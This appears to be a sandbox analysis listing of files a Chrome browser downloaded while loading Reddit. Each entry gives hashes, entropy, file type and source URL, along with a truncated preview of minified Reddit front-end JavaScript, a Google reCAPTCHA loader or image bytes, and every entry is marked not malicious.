                                                  Preview:import{_ as t,n as e,e as o}from"./shell-4994f581.js";import{s as r,x as i}from"./icon-4d9be652.js";import{ca as s,cd as a,ce as l,cb as h}from"./club-award-confirmation-client-js-b22d6f4f.js";let c=class extends r{constructor(){super(),this.ts="",this.short=!1,this.format="",this.locale="",this.date=new Date(this.ts)}getLocale(){return this.locale.length?this.locale:s()}createRenderRoot(){return this}render(){const t=a(this.getLocale(),{dateStyle:"full",timeStyle:"long"}).format(this.date),e={short:this.short,format:this.format.length?this.format:void 0},o=l(this.date,this.getLocale(),e);return i` <time datetime="${this.date.toISOString()}" title="${t}">${o}</time> `}};t([e({type:String})],c.prototype,"ts",void 0),t([e({attribute:"ts",converter:t=>h(t||"")})],c.prototype,"date",void 0),t([e({type:Boolean})],c.prototype,"short",void 0),t([e({type:String})],c.prototype,"format",void 0),t([e({type:String})],c.prototype,"locale",void 0),c=t([o("faceplate-timeago")],c);.//# sourceMappingUR
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1666), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):1666
                                                  Entropy (8bit):5.769838615289305
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:53EC1134D4C97E6EC53DD4113AB81415
                                                  SHA1:6313A2C430595633E75C6B6A82D0494A165BDA03
                                                  SHA-256:64F9E36753BCB78B6F27E2015733060DEB83CE7EF5976D6027EB0F575B84554C
                                                  SHA-512:7098FD10A5D6F40B8CA43404F140175468C4AA2C9B780AF7E0A8D0E903BCC4A97943543E9891B26B016634E366F4ADCF9BA2CB717F2ECC4DA7EF859F7DE519E7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.google.com/recaptcha/enterprise.js?render=6LcZL1spAAAAAIzQl_DXGakd-J2uwjnfZas9G-Rj
                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var E='enterprise',a=w[N]=w[N]||{},gr=a[E]=a[E]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/enterprise/';(cfg['enterprise']=cfg['enterprise']||[]).push(true);(cfg['enterprise2fa']=cfg['enterprise2fa']||[]).push(true);(cfg['render']=cfg['render']||[]).push('6LcZL1spAAAAAIzQl_DXGakd-J2uwjnfZas9G-Rj');(cfg['clr']=cfg['clr']||[]).push('true');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A7vZI3v+Gz7JfuRolKNM4Aff6zaGuT7X0mf3wtoZTnKv6497cVMnhy03KDqX7kBz/q/iidW7srW31oQbBt4VhgoAAACUeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJEaXNhYmxlVGhpcmRQYXJ0eVN0b3JhZ2VQYXJ0aXRpb25pbmczIiwiZXhwaXJ5IjoxNzU3
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4553)
                                                  Category:downloaded
                                                  Size (bytes):4601
                                                  Entropy (8bit):5.145614437489594
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A153C67C7C57D083CB503C4FCD422D56
                                                  SHA1:8AAE7B01EF2EAEC2B3E24677CC4C347F38EE1E9B
                                                  SHA-256:DA6B82741083F81B00314786C7E6F6898F16C50549DD5CB2144FC7E106FFD8B8
                                                  SHA-512:D212A654EC7E0F26CB8868D655E57EDCAA34B60F4EB95BD3E8D563E1E88357D0EA6C73C2EC9857A6C25F409ED6E4B5BAFC88B9F287AB9C16D9A6163E555DAC1D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-notes-c8ab3c80.js
                                                  Preview:import{g as a,j as e,I as t,$ as s,a0 as l}from"./icon-4d9be652.js";import{bF as o}from"./shell-4994f581.js";const{svg:n}=a();var r=e(n`<path d="M10 19.99a4.6 4.6 0 0 1-3.27-1.354l-5.366-5.365a4.627 4.627 0 0 1 0-6.542L6.73 1.364a4.627 4.627 0 0 1 6.542 0l5.365 5.364a4.627 4.627 0 0 1 0 6.542l-5.364 5.365A4.601 4.601 0 0 1 10 19.99Zm0-18.73a3.353 3.353 0 0 0-2.386.988L2.25 7.614a3.374 3.374 0 0 0 0 4.772l5.366 5.366a3.46 3.46 0 0 0 4.772 0l5.365-5.366a3.374 3.374 0 0 0 0-4.772L12.386 2.25A3.35 3.35 0 0 0 10 1.26Zm3.92 10.258c.066.112.1.24.1.37a.8.8 0 0 1-.094.35.7.7 0 0 1-.633.375.83.83 0 0 1-.387-.105c-.2-.116-1.033-.734-2.5-1.852.219 1.75.328 2.734.328 2.953.02.238-.043.476-.176.674a.651.651 0 0 1-.539.217c-.476 0-.714-.289-.714-.867 0-.242.11-1.226.328-2.953l-.364.27c-1.192.905-1.902 1.425-2.128 1.558a.85.85 0 0 1-.4.105.739.739 0 0 1-.715-.727.72.72 0 0 1 .1-.369.748.748 0 0 1 .287-.276c.234-.133 1.187-.547 2.86-1.242-1.67-.694-2.623-1.107-2.859-1.24a.859.859 0 0 1-.287-.282.673.67
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4653)
                                                  Category:downloaded
                                                  Size (bytes):4712
                                                  Entropy (8bit):5.271016908795812
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B95F0DFDEC6C26DED9CCF574293EC6F3
                                                  SHA1:06019484011DDA1BA14054E8A839F2E1E9CEF6F3
                                                  SHA-256:CC93B31BA41D5B8D74819029EA2358591423C610F565E9EFD56BF0B86C03EF29
                                                  SHA-512:2C61AC7664584513BE69C952D18F25400DB5537032D5EFDE6F87BDD83F19315F476479C79F002CBCA1396F8519D5104C3C329C1D69BF41C5780D97478A535DA0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/auth-flow-controller-2182cb9c.js
                                                  Preview:import{cF as t,b as e,H as o,c as s,bb as a,x as i,cG as n,bO as r,s as c,bc as d,b1 as h}from"./shell-4994f581.js";import{s as l,a as u}from"./password-recovery-fa619c78.js";import{b as p}from"./helpers-82480d34.js";import{O as m,ao as w}from"./club-award-confirmation-client-js-b22d6f4f.js";const g=/^(?:[a-zA-Z0-9-]+\.)?reddit\.com$/,b=["out.reddit.com","alb.reddit.com","blog.reddit.com","status.reddit.com","code.reddit.com","sp.reddit.com"],f=/^\u0020|[\u0000-\u0019\u1680\u180E\u2000-\u2029\u205f\u3000]/,v=["http:","https:"];let S=window.location;function E(){l();try{const e=new URL(S.href);e.pathname.match(t)&&(e.pathname="");const o=e.searchParams.get("dest");if(o&&function(t){if("string"!=typeof t||f.test(t))return!1;try{const{host:e,protocol:o}=new URL(t.toLowerCase());return!!o&&!!e&&v.includes(o)&&g.test(e)&&!b.includes(e)}catch(t){return!1}}(o)){const t=new URL(o);"old.reddit.com"===t.hostname&&t.searchParams.set("cache-bust",Date.now().toString()),e.href=t.toString()}else e.s
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):2074
                                                  Entropy (8bit):7.870203637151815
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CF095492829C479B59280A428D72D93D
                                                  SHA1:7A0455D0F4C7FD98157925E2A22D00AA08F8F399
                                                  SHA-256:91DC371A96C2C258BFFFC8755E0BF05D953DBDCCC1BD6564F137B0B61E26F829
                                                  SHA-512:1018A2998B42089844D8413C732BF5CDE702CA977A3C56253DE4C3BAC53D739DB2E879EB004E1455105544CD08428BC4E7F7D341E6314B1AE975262A448E07B0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_4vxm7y/styles/communityIcon_lvb1b3wl4er71.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=d0295cf902e37807ec57a1d34aef71928be2c863"
                                                  Preview:RIFF....WEBPVP8X......../../..ALPH......\..Iz!....T.,..`...W.34dp.\....J_..3...,.....6"...y..0....;.W".]..m.....g..?..h.i".....}.g..}...;..,....H.. k.h-z.w.z.6n..`" 9^;}}3......\S.YS..)v...j.k-Y...Q.I{.&..m|m..TF....M....1k.$.........&nt.5...`..7.v7..D...d2.. ...:.m...T33... ./..m...="Y..) 9.zx6Vm..5..."..|.w....EkV.... ...NF.h.f....$...c..+.B" .N.I\...TA...].7.A..@..{..dEd1.a......,.2.}..^0S....Pk*.U..A*.)......D.m"9...(........3..@....YTA.&.V..0.,.2Z..g........e#d....xb....qf.i.....F...O.'....B9Y.t2.mq&.....w.].C.i.....l...?-N.....6./-_B.U.6q..:.\...f..%)..b.N.c........u.1...Z.Q..hbn.......M.o...-..R...hc.u..=..lj...D.c.&.....t.ff.....s.M,.F...Yqvy..6.^..q......f...|g.jD.....VP8 H........*0.0.>Q .D#.!.V.8....UG....?...6.x..9.....g.5...w..I.v....O7.2xC......h~..K....~.....;._,....0?...q...3.Jb_...i..._...?.~......}.k.#.w.o..._.......e.-.p.._..1..:{.c....+.{.e.i...6/...&.&k.aV...e...3m..:.....$...3...E...-.....:..[.O.&.U.#......M...Ok.=...S...+0.8
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2134)
                                                  Category:downloaded
                                                  Size (bytes):3586
                                                  Entropy (8bit):5.088219606200314
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:86FE6A58098E852CF35CAD4EC836395F
                                                  SHA1:6C2DD9FE3D9FD225D4C9516C9010882E602B65CA
                                                  SHA-256:806D7569F0D8A63FBB1C3DFFD2468C8E0F99A515EB27D8EF7560F3537B4A9BBA
                                                  SHA-512:04AFFC2FCEFF5FAD8C231C24DDFC21CC8840D182A97312E1FC048A69A4C291CD930A3E69692E5EFF040DE6C974A84824768AB4A5743655E78F54F5ADF4E9EEB6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-switch-input-14302c35.js
                                                  Preview:import{_ as a,n as r,e as o}from"./shell-4994f581.js";import{a as e,x as t,M as i,I as c}from"./icon-4d9be652.js";import{C as n}from"./helpers-ca93cf1a.js";var s;!function(a){a.PRIMARY="primary",a.BRAND="brand"}(s||(s={}));const d={[s.PRIMARY]:"switch-input-primary",[s.BRAND]:"switch-input-brand"};let l=class extends n{constructor(){super(...arguments),this.appearance=s.PRIMARY}static get styles(){return[super.styles,e`.switch-input-primary{--checked-color-background-default:var(--color-switch-input-background-checked);--checked-color-background-hover:var(--color-switch-input-background-checked-hover)}.switch-input-brand{--checked-color-background-default:var(--color-brand-background);--checked-color-background-hover:var(--color-brand-background-hover)}.outer{background:var(--color-switch-input-background-default);border-radius:var(--radius-full);box-shadow:var(--elevation-switch-input-default-inset);height:var(--size-switch-input-h);vertical-align:middle;width:var(--size-switch-input-
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (18685)
                                                  Category:downloaded
                                                  Size (bytes):18734
                                                  Entropy (8bit):5.129961664850017
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FF1B6659529A63BC44D331D7B113C638
                                                  SHA1:C9404102AAF361E9F4CF3CFA36461AA538903D0E
                                                  SHA-256:B4B222F52A465C9A46DB5F88EDB69B229EC9EB940C76E7E72EAD6216AED77E5E
                                                  SHA-512:FAC505CEF84F08D34D34AB7A14829F6E9482721675BE04CCA423FFC6FA25FF547EC9A9D664EE4E7203A6F50C00FDC837972BA2214ECB4CFBE583697BDE0B3B1E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/text-input-1c750feb.js
                                                  Preview:import{_ as t,g as e,n as a,e as i,H as r,a3 as s,u as o,v as n,I as l,am as c}from"./shell-4994f581.js";import{c as h}from"./index-169ed00b.js";import{s as p,a as d,x as u,l as v,an as b,I as g,Z as y,z as f}from"./icon-4d9be652.js";import{F as m}from"./filterNullish-3e68f24c.js";class x{constructor(t,e){this._observedNames=new Set,this._previousStates=new Map,this._records=new Map,this._eventListener=t=>{this._processRecord(t.detail)},this._callCallback=()=>{this._records.size&&this._callback(this.takeRecords(),this)},this._callback=t,this.form=e.form}_processRecord(t){const e=!this._records.size,{input:a,message:i,name:r}=t;if(!this._observedNames.has(r))return;this._previousStates.get(r)!==i&&(this._records.set(r,{target:a,message:i,name:r}),this._previousStates.set(r,i),this._records.size&&e&&queueMicrotask(this._callCallback))}observe(t){if(this._observedNames.has(t))return;this._observedNames.add(t),1===this._observedNames.size&&this.form.addEventListener("_faceplate-validation-
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (11052)
                                                  Category:downloaded
                                                  Size (bytes):11105
                                                  Entropy (8bit):5.125546694433664
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1B045A896A567F4801CD8C83E7402950
                                                  SHA1:C268293EE8BF4C334A3419E3EE2C5AF1AEF1891A
                                                  SHA-256:BB8A4E1A212952A7C34B4C87DAD43718F33CE688D62EB2D4FAEE183ACF4F8897
                                                  SHA-512:E3AFC85A10172C5580003A945068A09FA270EA1951072AA2E8A7F587102CB78519FEDBB50184416E4B9FCDD0B265D7AF6E48B1A7252B6DF9A85D0968831ED7C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-form-520b1141.js
                                                  Preview:import{eM as t,eN as e,dF as i,eO as n,_ as s,bm as a,s as o,E as r,eP as l,H as c,eQ as d,c as u,eR as h,eS as f,eT as p,cG as m,bO as v,n as g,e as y}from"./shell-4994f581.js";import{s as b,a as E,x as _}from"./icon-4d9be652.js";import{a as S,d as I,b as L,r as A,e as w,F as O,f as F,g as M,h as T}from"./index-169ed00b.js";function V(t){if(S(t)&&(t.checked=t.hasAttribute("checked")),I(t))t.formResetCallback&&t.formResetCallback();else if(t instanceof HTMLInputElement)t.value=t.getAttribute("value")||"";else if(t instanceof HTMLTextAreaElement)t.value=t.textContent||"";else if(L(t))for(const e of t.options)e.selected=e.hasAttribute("selected");else t instanceof HTMLOutputElement&&(t.value=t.defaultValue)}function C(e){const i={};for(const n of e){const[e,s]=n;if(s instanceof File)throw t(e);Object.prototype.hasOwnProperty.call(i,e)?Array.isArray(i[e])?i[e].push(s):i[e]=[i[e],s]:i[e]=s}return i}const R=(t,e=0)=>{if(6!==e)return t instanceof HTMLInputElement||t instanceof HTMLButtonElem
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 40 x 40, 8-bit colormap, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):1709
                                                  Entropy (8bit):7.811688172356529
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E844E59E2939B3A8C365F48C3A34CAE1
                                                  SHA1:B7235621809A07D7FE406356464D407CC1760AE0
                                                  SHA-256:2CAC9BD2C4C27DBAFF2357BF6CC1FBDDCA94132262C447463B9DB6CB22C2F71D
                                                  SHA-512:46E57687F9403CF0A29D1B2943B61A4DEA7D3D75C8AAAB86BBDABD259B4B76E5073E67EFC0A8345C7C7E7B5831BC14F4FB472D7BBEC141ADAD5CFE29274A016F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/marketplace-assets/v1/core/awards/wholsome_v1_40.png
                                                  Preview:.PNG........IHDR...(...(...... H_....PLTE...........................................................h..D........ws477.........277......L.....367...L.....J....G........2.*..........6LIK..I.....F..E..C..B..............?..9c]5AAJ..>..&...(..........<zoD..:..7.G."........F..A..>.y..t..$.................}......8.5. ....e......>.........y7WRLNH......~......b..R..G..Y...4.B..6..:.......E............................x..x1.s~|i;nefeZW^S-FF@B?0>?................{..n....a..X..I..m..K......@..J..O.......>.........A.1...,....+..h.......@....=........=........|.t.6..U....e..6..C..B........F..t..B..R..........*.....:.~..|?.z..s{.p.tp6tk;ng$^\5_Y(SR...O... tRNS. ..p`..@..P.0.0..........p`.l.MH....IDAT8..esZA......Y(.b)$....I.)m...................v....0.g.}....w...5...Z....*V....TnR...Y.Gm.0l.N....IQ.wO....[r...-[...AU.K5%...-%:.!..w.4.t......0a.....u..k\..ED\.......R{..!cJ..Kt.}:..GfE...~]]}..D,....l.-,.J
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (863)
                                                  Category:downloaded
                                                  Size (bytes):924
                                                  Entropy (8bit):4.901509579406822
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7BF9CA62D2FBCE2DE99405031BA7C524
                                                  SHA1:049335F9BB4D5B3F23AFFF372630FD98CB9145EB
                                                  SHA-256:3D650F53B22AB7CF452419897B6A74FA2287C3C470DB7CA2619B6050FAC84FAC
                                                  SHA-512:D6BCDEA6BDB47FBCF1D416CA577C48B7CFA9D6F9628BD1F4919530EFF0A318533BDE11FE152DA5881AF87B2E018C86F06A394451E289C4AD79A8529582A00800
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.js
                                                  Preview:import"./shreddit-feed-page-loading-7a9d44d9.js";import"./feed-feature-client-js-82508c4e.js";import"./shreddit-post-translator-9cb3ecae.js";import"./shreddit-layout-event-setter-d0949dae.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./translation-feedback-modal-client-js-8ce911d1.js";import"./chat-mobile-xpromo-client-js-58e17cee.js";import"./faceplate-textarea-input-ab5075d8.js";import"./text-input-1c750feb.js";import"./index-169ed00b.js";import"./filterNullish-3e68f24c.js";import"./translations-13fc818b.js";import"./app-selector-client-js-489f074c.js";import"./index-56e4320e.js";import"./feeds-efba5867.js";import"./base-translator-b41f5754.js";import"./links-27a3f3ef.js";import"./translation-intervention-modal-db1a7e08.js";import"./banned-user-banner-client-js-feaea128.js";.//# sourceMappingURL=popular-feed-client-js-5048ccd1.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (25520)
                                                  Category:downloaded
                                                  Size (bytes):25569
                                                  Entropy (8bit):5.267052981542513
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:84B1AA03A2CDB983E1036A3AC7354E9E
                                                  SHA1:BA4380DAE71334FCDB92B7F7EDB80C4A8F1C5318
                                                  SHA-256:0988D1891C98BF3BFFC8E0F1E08D072DD0993D5814F1FFFC764DF911C3FEDA76
                                                  SHA-512:2B36DA728037B6842E4A8E94F4C804A0471A2DBFACF6F492DBC3135737EF5B6BC1FFA7F54CE5F55CB3B6D1B906305716C94A11ECC5EEDDB1ADBEDD34176909E5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/rpl-popper-3f91bd17.js
                                                  Preview:import{Y as t,_ as e,I as o,n as i,b8 as n,a3 as r,e as a}from"./shell-4994f581.js";import{a as s,x as l}from"./icon-4d9be652.js";const c=Math.min,p=Math.max,f=Math.round,h=Math.floor,u=t=>({x:t,y:t}),d={left:"right",right:"left",bottom:"top",top:"bottom"},m={start:"end",end:"start"};function y(t,e,o){return p(t,c(e,o))}function g(t,e){return"function"==typeof t?t(e):t}function v(t){return t.split("-")[0]}function b(t){return t.split("-")[1]}function w(t){return"x"===t?"y":"x"}function x(t){return"y"===t?"height":"width"}function P(t){return["top","bottom"].includes(v(t))?"y":"x"}function E(t){return w(P(t))}function R(t){return t.replace(/start|end/g,(t=>m[t]))}function S(t){return t.replace(/left|right|bottom|top/g,(t=>d[t]))}function z(t){return"number"!=typeof t?function(t){return{top:0,right:0,bottom:0,left:0,...t}}(t):{top:t,right:t,bottom:t,left:t}}function A(t){return{...t,top:t.y,left:t.x,right:t.x+t.width,bottom:t.y+t.height}}function T(t,e,o){let{reference:i,floating:n}=t;co
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1245)
                                                  Category:downloaded
                                                  Size (bytes):1297
                                                  Entropy (8bit):4.99083774771142
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:06E7BD879171EE79F53E2F60A8C3E456
                                                  SHA1:1E8BE24AA5BBB7EC06B242A1FDEC8AC5A9E7E3F6
                                                  SHA-256:35A7C58461C4C9AF28A624974EE8A925512AD7082B001FF1E5981B4C12B25624
                                                  SHA-512:A87B3F8994DC241EB6821B150190289D14B66D1E1375C8CC2B3975F3D87657EB3FC5A91157336EC7EDA7CFD0F45C8E8FC0F382180927E1355C34BD3164ACCF1B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/search-params-246786c0.js
                                                  Preview:import{aA as r}from"./shell-4994f581.js";var s;function o(s){const o={q:s.query};return s.pane&&(o.type=s.pane),s.source&&(o.source=s.source),s.sort&&(o.sort=s.sort),s.time&&(o.t=s.time),s.referrer&&(o.referrer=s.referrer),s.cursor[r.All]&&(o.cursor=s.cursor[r.All]),s.cursor[r.Posts]&&(o.postsCursor=s.cursor[r.Posts]),s.cursor[r.Comments]&&(o.commentsCursor=s.cursor[r.Comments]),s.cursor[r.Subreddits]&&(o.communitiesCursor=s.cursor[r.Subreddits]),s.cursor[r.Users]&&(o.peopleCursor=s.cursor[r.Users]),s.ad&&(o.ad=s.ad),s.conversationId&&(o.cId=s.conversationId),s.impressionId&&(o.iId=s.impressionId),o}!function(r){r.Ad="ad",r.AllCursor="cursor",r.CommentsCursor="commentsCursor",r.CommunitiesCursor="communitiesCursor",r.ConversationId="cId",r.ImpressionId="iId",r.Pane="type",r.PeopleCursor="peopleCursor",r.PostsCursor="postsCursor",r.Query="q",r.Referrer="referrer",r.Sort="sort",r.Source="source",r.Time="t"}(s||(s={}));function e(r){const s=new URLSearchParams({...o(r)});return`${(r=>r.en
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 640x1387, components 3
                                                  Category:dropped
                                                  Size (bytes):143182
                                                  Entropy (8bit):7.978544140247947
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E6741494CE00DCB7544D296E152907CD
                                                  SHA1:A363FFB6A4AEF1EB1451A400DD0DC6F681F69C75
                                                  SHA-256:87F58CA262D5E077FE2EBD16741A90CC89F5477A09C2D0466ABA4D63AE94BADC
                                                  SHA-512:91997CFFAF7D745A6087E1A13883BAEE20DDC9838AD9306D50E928299964F6D5276D88702649F1CAEF0BEFDBC6E182ABEB83E3A52A57770D541E687C1D27AECE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......k....".........................................\..........................1..!A.Q..."2RTaq.46BSUrt....#357su......Vc...$Cbv.%d..&'H..8De..................................D..........................!1"AQ...Taq.#25RSr...3Bs........$bt4DUc.............?..z.\f..n...%5..Z......-kT-.".."..".."..".."\.."\...../....2.%...Y..3.gj...$OKVv..Y.fv/CW.....,.X....+.+.D.U..H.U...................................................r."...%..U.%..^.)...yV.....Y.....Y......N..9}...z....F.MnG..-..KTX.E"DQ.%a..!..!..!..!..%..*...pH..xV.xH.B..,.H...`j..'..;V...I3;......jD..,-Y.D..z..$J.P.....UP*.B"$B"$B"$B"$B"$B*.D.*.D.*.D.*.D.*.D.*.D."$B"$B"$B"$B.\.H.DH..*.$KU.^.).....e"XV.,.b>i...2.9c)..."....H."$.""D""D""D.b.9,....e.m...17.....J.j...4]..s..D..N.&.....x..d.v..6..s.x. .].M....+`<Cb.u..H.u.a.i.l.4......8..\.J..........cy.L..G.6..:>....IRw7.{..H.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):95
                                                  Entropy (8bit):4.347811435468635
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                  SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                  SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                  SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/assets/pix/ads/1.png
                                                  Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2416)
                                                  Category:downloaded
                                                  Size (bytes):2475
                                                  Entropy (8bit):5.127601401186277
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1992E4FDC6DCB1E51E79B2FC24106080
                                                  SHA1:67BA08393AA04E32E3F5DFB8391811AE75E9136A
                                                  SHA-256:7688ECDBAB0B98408E2BB214D976BC21825352C502256208D3ECF7DA80031E8E
                                                  SHA-512:3AF0D0C3701E3B9C5F76D37E61E0A3C1374799C0EDFAA40214725154408C2C57BD8F66B8EBA56D244DF730EDF843BC66B252CD7728BC3CCDEDE4DD700F5AC21D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/reputation-recaptcha-ba0b694c.js
                                                  Preview:import{K as e,O as t,Z as a,_ as r,n,e as i}from"./shell-4994f581.js";import{x as s,L as o,R as c}from"./club-award-confirmation-client-js-b22d6f4f.js";import{s as d}from"./icon-4d9be652.js";const l=Math.ceil(20);let p=class extends d{constructor(){super(...arguments),this.siteKey="",this.loadedScriptsByKey=new Map,this.execute=async()=>{try{const e=this.getConfig();return!!e&&(await this.load(this.siteKey),await this.manageToken(e),!0)}catch(e){return e instanceof Error&&window.Sentry?.captureException(e),!1}}}connectedCallback(){super.connectedCallback(),window.addEventListener("afterRoute",this.execute),this.execute()}disconnectedCallback(){window.removeEventListener("afterRoute",this.execute),super.disconnectedCallback()}async load(e){this.loadedScriptsByKey.has(e)||this.loadedScriptsByKey.set(e,this.loadLazyScriptForKey(e)),await this.loadedScriptsByKey.get(e),this.executeIsReady()||await this.pollExecuteIsReady()}executeIsReady(){return"function"==typeof window.grecaptcha?.enterp
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1897)
                                                  Category:downloaded
                                                  Size (bytes):1976
                                                  Entropy (8bit):5.20110897548103
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3FE0730585B104FB4B1E62FF0B2F9801
                                                  SHA1:4F7BB9609DF1D536361A7708BDF6F52E7F729E7C
                                                  SHA-256:3374B657AD8872463E2D15F2639BE2BABCD352E835A6F1367E5CAD36CB515D1B
                                                  SHA-512:9EA2E0F9BE3CFA866564CD888D8CAB1B3CDBF45E7BA9A6DF30FABFAE77D60A42FD0C8477C6711815D4227F6C6E77C9D7EE327AFD7DA33AD586B53F48151A47C6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/all-chats-page-recommendations-client-js-e5594d8f.js
                                                  Preview:import{r as e,cQ as t}from"./shell-4994f581.js";import{a1 as i,cA as r,cB as a}from"./club-award-confirmation-client-js-b22d6f4f.js";import"./icon-4d9be652.js";class s extends HTMLElement{constructor(){super(),this.childAnchor=null,this.chatUrl=null,this.mobilePermalink=null,this.handleAnchorClick=async e=>{if(!this.chatUrl)return;if(e.preventDefault(),this.mobilePermalink){const e=new URL(this.mobilePermalink,window.location.href).searchParams.get("r"),t=document.querySelector(`faceplate-modal[name="${a}"]`),i=t?.querySelector("a.app-link");if(i?.href){const t=new URL(i.href);e&&t.searchParams.set("r",e),t.searchParams.set("$android_deeplink_path",`reddit${this.mobilePermalink}`),t.searchParams.set("$deeplink_path",this.mobilePermalink),t.searchParams.set("$og_redirect",`${CLIENT_CONFIG.ORIGIN}${this.mobilePermalink}`),t.searchParams.set("base_url",this.mobilePermalink),i.setAttribute("href",t.toString())}return void this.dispatchEvent(new CustomEvent(a,{bubbles:!0}))}let t=document.q
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1361)
                                                  Category:downloaded
                                                  Size (bytes):1421
                                                  Entropy (8bit):5.172588159516225
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:86483F6991AFA32B731DFB373342BD8A
                                                  SHA1:02A72C94FA5977980CC56657C834AC8DE72B788B
                                                  SHA-256:0009C7C883B8DA4032A83D287982A523BFB9528BAF497E0148ACD787B8A07888
                                                  SHA-512:0865D43CEFB0808D91B07C55515BF2F1CFBA855C730EE0AB13DD4284DC89E534565D3CBF11AC00F51107756DEB84CCC8B0EC27C8DAEF3DC5CD4C689B04CFBB53
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/hui-left-nav-see-more-6c847fa5.js
